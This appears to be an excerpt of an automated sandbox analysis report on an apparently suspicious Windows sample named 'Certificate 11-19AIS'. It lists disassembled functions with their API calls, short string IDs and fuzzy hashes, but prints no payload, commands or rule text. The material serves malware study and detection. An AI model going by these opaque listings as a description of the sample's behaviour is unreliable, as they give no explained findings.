                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                              • String ID: static
                                                                              • API String ID: 2559357485-2160076837
                                                                              • Opcode ID: ac9fcdc7955a95d8afc25bc20ea561ee6f3b73c0f9ae7dc8c145856e9dc42ebe
                                                                              • Instruction ID: 356c18133c1c162f0b64dd6ad8ca478d068ee93983c29949d61270b9202da698
                                                                              • Opcode Fuzzy Hash: ac9fcdc7955a95d8afc25bc20ea561ee6f3b73c0f9ae7dc8c145856e9dc42ebe
                                                                              • Instruction Fuzzy Hash: 44318B31101214ABDF259FA4EC49FEA3B6DFF59360F110624FA29E60A0C736D861DBA5
                                                                              Function 007F6F02 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72networkCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                              • String ID: 0.0.0.0
                                                                              • API String ID: 2620052-3771769585
                                                                              • Opcode ID: 5b3a546a27cb90caabdeda6bd6b466f6f536eb4abfbd74b8e080a311692a13d3
                                                                              • Instruction ID: 0b6b6fcd349365c3b7f4cc50fafe9d94ceee57474add7b4b5eb9d0687850b60a
                                                                              • Opcode Fuzzy Hash: 5b3a546a27cb90caabdeda6bd6b466f6f536eb4abfbd74b8e080a311692a13d3
                                                                              • Instruction Fuzzy Hash: 5511DA7160421DEBDB24AB74AC4DEEA77BCEF40710F00056AF245D6291EF78DE858790
                                                                              Function 007D500E Relevance: 16.8, APIs: 11, Instructions: 257COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 007D5047
                                                                                • Part of subcall function 007D7C0E: __getptd_noexit.LIBCMT ref: 007D7C0E
                                                                              • __gmtime64_s.LIBCMT ref: 007D50E0
                                                                              • __gmtime64_s.LIBCMT ref: 007D5116
                                                                              • __gmtime64_s.LIBCMT ref: 007D5133
                                                                              • __allrem.LIBCMT ref: 007D5189
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007D51A5
                                                                              • __allrem.LIBCMT ref: 007D51BC
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007D51DA
                                                                              • __allrem.LIBCMT ref: 007D51F1
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007D520F
                                                                              • __invoke_watson.LIBCMT ref: 007D5280
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                              • String ID:
                                                                              • API String ID: 384356119-0
                                                                              • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                              • Instruction ID: 41bab9c9ce50feb99ca1fa12f601e57a7e2688661ce7e87743f1fc685d42a563
                                                                              • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                              • Instruction Fuzzy Hash: 0771D5B2A01B16EBE714AE79CC46B6A73B8BF14764F14422BF414D6381E778ED408BD0
                                                                              Function 007F4DDD Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 007F4DF8
                                                                              • GetMenuItemInfoW.USER32(00871708,000000FF,00000000,00000030), ref: 007F4E59
                                                                              • SetMenuItemInfoW.USER32(00871708,00000004,00000000,00000030), ref: 007F4E8F
                                                                              • Sleep.KERNEL32(000001F4), ref: 007F4EA1
                                                                              • GetMenuItemCount.USER32(?), ref: 007F4EE5
                                                                              • GetMenuItemID.USER32(?,00000000), ref: 007F4F01
                                                                              • GetMenuItemID.USER32(?,-00000001), ref: 007F4F2B
                                                                              • GetMenuItemID.USER32(?,?), ref: 007F4F70
                                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 007F4FB6
                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007F4FCA
                                                                              • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007F4FEB
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                              • String ID:
                                                                              • API String ID: 4176008265-0
                                                                              • Opcode ID: 906876ead408647fd3ee83ed5b3365d0e043dd83619d1f5d4c4dcdd95115f6ae
                                                                              • Instruction ID: dd141ea0f2a0ecfc6b34d526ec1e6352f5bf23141f1d6a01d0b3a78d91cdd8e7
                                                                              • Opcode Fuzzy Hash: 906876ead408647fd3ee83ed5b3365d0e043dd83619d1f5d4c4dcdd95115f6ae
                                                                              • Instruction Fuzzy Hash: D9617A7190024DAFDB21CFA8D888ABF7BF8BB41318F180559FA56A7351D738AD45CB20
                                                                              Function 00819C16 Relevance: 16.7, APIs: 11, Instructions: 183windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00819C98
                                                                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00819C9B
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00819CBF
                                                                              • _memset.LIBCMT ref: 00819CD0
                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00819CE2
                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00819D5A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$LongWindow_memset
                                                                              • String ID:
                                                                              • API String ID: 830647256-0
                                                                              • Opcode ID: f23c12a89ee63ae4ee98f3b9a318d87691962950327ee8af507d6a91f703e3ce
                                                                              • Instruction ID: ebcf2a33c6a66de9c65e50fb9b8393600011f7b32a675d43e0724c1bb013581d
                                                                              • Opcode Fuzzy Hash: f23c12a89ee63ae4ee98f3b9a318d87691962950327ee8af507d6a91f703e3ce
                                                                              • Instruction Fuzzy Hash: 35618B75900208AFDB10DFA8DC85EEE77B8FF09704F14415AFA58E7291D774AA82DB50
                                                                              Function 007E94E1 Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 007E94FE
                                                                              • SafeArrayAllocData.OLEAUT32(?), ref: 007E9549
                                                                              • VariantInit.OLEAUT32(?), ref: 007E955B
                                                                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 007E957B
                                                                              • VariantCopy.OLEAUT32(?,?), ref: 007E95BE
                                                                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 007E95D2
                                                                              • VariantClear.OLEAUT32(?), ref: 007E95E7
                                                                              • SafeArrayDestroyData.OLEAUT32(?), ref: 007E95F4
                                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 007E95FD
                                                                              • VariantClear.OLEAUT32(?), ref: 007E960F
                                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 007E961A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                              • String ID:
                                                                              • API String ID: 2706829360-0
                                                                              • Opcode ID: 0c84396098bfdc6ab754bd6c918a10f43214b4d10a9d279576cbda2d83d86160
                                                                              • Instruction ID: 57c012868ca86783f9e0af7db298d78c1b6af9eabfc3ffc9d7cce0c39e6e82a0
                                                                              • Opcode Fuzzy Hash: 0c84396098bfdc6ab754bd6c918a10f43214b4d10a9d279576cbda2d83d86160
                                                                              • Instruction Fuzzy Hash: F2415E71900219EFCB01EFA5EC489DEBB79FF48354F008469F501A3251DB34EA55CBA5
                                                                              Function 0080ADAE Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 007B936C: __swprintf.LIBCMT ref: 007B93AB
                                                                                • Part of subcall function 007B936C: __itow.LIBCMT ref: 007B93DF
                                                                              • CoInitialize.OLE32 ref: 0080ADF6
                                                                              • CoUninitialize.OLE32 ref: 0080AE01
                                                                              • CoCreateInstance.OLE32(?,00000000,00000017,0083D8FC,?), ref: 0080AE61
                                                                              • IIDFromString.OLE32(?,?), ref: 0080AED4
                                                                              • VariantInit.OLEAUT32(?), ref: 0080AF6E
                                                                              • VariantClear.OLEAUT32(?), ref: 0080AFCF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                              • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                              • API String ID: 834269672-1287834457
                                                                              • Opcode ID: de5d8e144fc928862ced869a9f70374409c798f5c0003468a9a5d5fc5f3e7ff1
                                                                              • Instruction ID: 104b2ed65bd90340f6d6586e1d271917b8904a563cecd842025d7f960d2b4cbf
                                                                              • Opcode Fuzzy Hash: de5d8e144fc928862ced869a9f70374409c798f5c0003468a9a5d5fc5f3e7ff1
                                                                              • Instruction Fuzzy Hash: 4F615671208312AFC755DF64D889B6ABBE8FF88714F104819FA85DB291CB74ED44CB92
                                                                              Function 00808107 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • WSAStartup.WSOCK32(00000101,?), ref: 00808168
                                                                              • inet_addr.WSOCK32(?,?,?), ref: 008081AD
                                                                              • gethostbyname.WSOCK32(?), ref: 008081B9
                                                                              • IcmpCreateFile.IPHLPAPI ref: 008081C7
                                                                              • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00808237
                                                                              • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 0080824D
                                                                              • IcmpCloseHandle.IPHLPAPI(00000000), ref: 008082C2
                                                                              • WSACleanup.WSOCK32 ref: 008082C8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                              • String ID: Ping
                                                                              • API String ID: 1028309954-2246546115
                                                                              • Opcode ID: 883df0f7c58f31fb073c3204c2db4a469662873549e9e508c0c858789a5a0de5
                                                                              • Instruction ID: f5c2b9d3f2ee89cc00876776583f7863a3e706b0321de856fe4b25c4d13571c3
                                                                              • Opcode Fuzzy Hash: 883df0f7c58f31fb073c3204c2db4a469662873549e9e508c0c858789a5a0de5
                                                                              • Instruction Fuzzy Hash: A6517A31604704DFD760AB24DC49B6ABBE5FF48310F048829FA95DB2E1DB74E941CB41
                                                                              Function 007FE389 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(00000001), ref: 007FE396
                                                                              • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 007FE40C
                                                                              • GetLastError.KERNEL32 ref: 007FE416
                                                                              • SetErrorMode.KERNEL32(00000000,READY), ref: 007FE483
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Error$Mode$DiskFreeLastSpace
                                                                              • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                              • API String ID: 4194297153-14809454
                                                                              • Opcode ID: 051aa775f3aadaec03d374f2a5f3340d18ea5efa507ca5cbfb4c2b4520b64d01
                                                                              • Instruction ID: 270f41aa8b8737f233142a3c7e8d7041c010772b9919030dcc152160ae0cd68a
                                                                              • Opcode Fuzzy Hash: 051aa775f3aadaec03d374f2a5f3340d18ea5efa507ca5cbfb4c2b4520b64d01
                                                                              • Instruction Fuzzy Hash: C9314035A0024DDBDB01EB68D949BBEB7B4FF44300F148469FA15EB3A1DA789A01CB91
                                                                              Function 007EB907 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 007EB98C
                                                                              • GetDlgCtrlID.USER32 ref: 007EB997
                                                                              • GetParent.USER32 ref: 007EB9B3
                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 007EB9B6
                                                                              • GetDlgCtrlID.USER32(?), ref: 007EB9BF
                                                                              • GetParent.USER32(?), ref: 007EB9DB
                                                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 007EB9DE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$CtrlParent
                                                                              • String ID: ComboBox$ListBox
                                                                              • API String ID: 1383977212-1403004172
                                                                              • Opcode ID: 496d29dd676cbab2fd5eaa37a0a2378a3cbae63b6519fd5408bab043b24535ee
                                                                              • Instruction ID: 3eced2d592a76bccf60b70d00c4dcc4f7363ad88d580907e80102558a76cff97
                                                                              • Opcode Fuzzy Hash: 496d29dd676cbab2fd5eaa37a0a2378a3cbae63b6519fd5408bab043b24535ee
                                                                              • Instruction Fuzzy Hash: D021C4B4900204EFCB05ABA1DC86EFEBBB4EB99300B104115F661972D2DB7D98159B60
                                                                              Function 007EB9F0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 007EBA73
                                                                              • GetDlgCtrlID.USER32 ref: 007EBA7E
                                                                              • GetParent.USER32 ref: 007EBA9A
                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 007EBA9D
                                                                              • GetDlgCtrlID.USER32(?), ref: 007EBAA6
                                                                              • GetParent.USER32(?), ref: 007EBAC2
                                                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 007EBAC5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$CtrlParent
                                                                              • String ID: ComboBox$ListBox
                                                                              • API String ID: 1383977212-1403004172
                                                                              • Opcode ID: 1fa38ad41a954e4b0ca5590361fceafde0db927b3207ed50453a24ecbc1c61a9
                                                                              • Instruction ID: 90f864f1b09bcf2de99f793cab300df6d9e3c9d2e918c4fd479da00913c786c4
                                                                              • Opcode Fuzzy Hash: 1fa38ad41a954e4b0ca5590361fceafde0db927b3207ed50453a24ecbc1c61a9
                                                                              • Instruction Fuzzy Hash: 1521C1B4900204BBDF01ABA0CC86FFEBB75FF49300F004015F56197291EB7D88299B60
                                                                              Function 007EBAD7 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetParent.USER32 ref: 007EBAE3
                                                                              • GetClassNameW.USER32(00000000,?,00000100), ref: 007EBAF8
                                                                              • _wcscmp.LIBCMT ref: 007EBB0A
                                                                              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 007EBB85
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ClassMessageNameParentSend_wcscmp
                                                                              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                              • API String ID: 1704125052-3381328864
                                                                              • Opcode ID: 71174c523e73de090d8bc39b72da2ed0689cf5cff152cccead9ab1de7d70e462
                                                                              • Instruction ID: ff9365b4d15ef179e8cf037a35cf45f985c401dd5be4156abc92914d579c37d6
                                                                              • Opcode Fuzzy Hash: 71174c523e73de090d8bc39b72da2ed0689cf5cff152cccead9ab1de7d70e462
                                                                              • Instruction Fuzzy Hash: 631129B6608753FAFA206735EC0BDA73BACEB29724F200022F955E41D5FFADA8214554
                                                                              Function 0080B2A9 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • VariantInit.OLEAUT32(?), ref: 0080B2D5
                                                                              • CoInitialize.OLE32(00000000), ref: 0080B302
                                                                              • CoUninitialize.OLE32 ref: 0080B30C
                                                                              • GetRunningObjectTable.OLE32(00000000,?), ref: 0080B40C
                                                                              • SetErrorMode.KERNEL32(00000001,00000029), ref: 0080B539
                                                                              • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 0080B56D
                                                                              • CoGetObject.OLE32(?,00000000,0083D91C,?), ref: 0080B590
                                                                              • SetErrorMode.KERNEL32(00000000), ref: 0080B5A3
                                                                              • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0080B623
                                                                              • VariantClear.OLEAUT32(0083D91C), ref: 0080B633
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                              • String ID:
                                                                              • API String ID: 2395222682-0
                                                                              • Opcode ID: b0aa68706d8f9ee879b497ba1693734228e4154ad668edc3cc840b7e71f4ad22
                                                                              • Instruction ID: 15157166db87df4ace167f10284facdfeb429a10f341abfaff4180b49cea1886
                                                                              • Opcode Fuzzy Hash: b0aa68706d8f9ee879b497ba1693734228e4154ad668edc3cc840b7e71f4ad22
                                                                              • Instruction Fuzzy Hash: 24C10171608305AFC740DF68C885A6AB7E9FF88708F04495DF98ADB291DB71ED05CB92
                                                                              Function 007F67E9 Relevance: 15.1, APIs: 10, Instructions: 107windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __swprintf.LIBCMT ref: 007F67FD
                                                                              • __swprintf.LIBCMT ref: 007F680A
                                                                                • Part of subcall function 007D172B: __woutput_l.LIBCMT ref: 007D1784
                                                                              • FindResourceW.KERNEL32(?,?,0000000E), ref: 007F6834
                                                                              • LoadResource.KERNEL32(?,00000000), ref: 007F6840
                                                                              • LockResource.KERNEL32(00000000), ref: 007F684D
                                                                              • FindResourceW.KERNEL32(?,?,00000003), ref: 007F686D
                                                                              • LoadResource.KERNEL32(?,00000000), ref: 007F687F
                                                                              • SizeofResource.KERNEL32(?,00000000), ref: 007F688E
                                                                              • LockResource.KERNEL32(?), ref: 007F689A
                                                                              • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 007F68F9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
